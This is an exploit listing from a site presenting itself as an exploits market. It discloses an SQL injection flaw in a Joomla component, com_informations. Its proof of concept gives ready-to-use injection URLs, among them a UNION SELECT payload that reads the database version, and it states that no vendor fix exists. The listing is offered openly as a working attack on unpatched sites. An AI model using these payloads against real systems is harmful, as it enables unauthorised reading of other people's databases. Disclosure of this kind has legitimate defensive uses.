[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla com_informations component - SQL Injection vulnerability

Author
Omar AbuHassan
Risk
[
Security Risk High
]
0day-ID
0day-ID-24054
Category
web applications
Date add
15-08-2015
Platform
php
# Exploit Title: Joomla com_informations component SQL Injection vulnerability
# Date: 13-08-2015
# Software Link: N/A
# Exploit Author: Omar AbuHassan
# Contact: https://www.linkedin.com/pub/omar-abu-hassan/bb/600/960
# CVE: N/A
# Category: webapps
# Version: All
# Tested on: Kali linux (x64) / Windows 8.1 pro (x64)
  
1. Description
    
Normal user can inject sql query in the url which lead to read data from the database.
  
2. Proof of Concept
 
http://[target]/index.php?option=com_informations&view=sousthemes&themeid=-3 (SQLI)
 
Injected column is # 3
 
http://[target]//index.php?option=com_informations&view=sousthemes&themeid=999.9+union+select+111,222,version()%23
 
** No solution yet from vendor **
 
#######################
# Greets to Palestine #
#######################

#  0day.today [2024-05-20]  #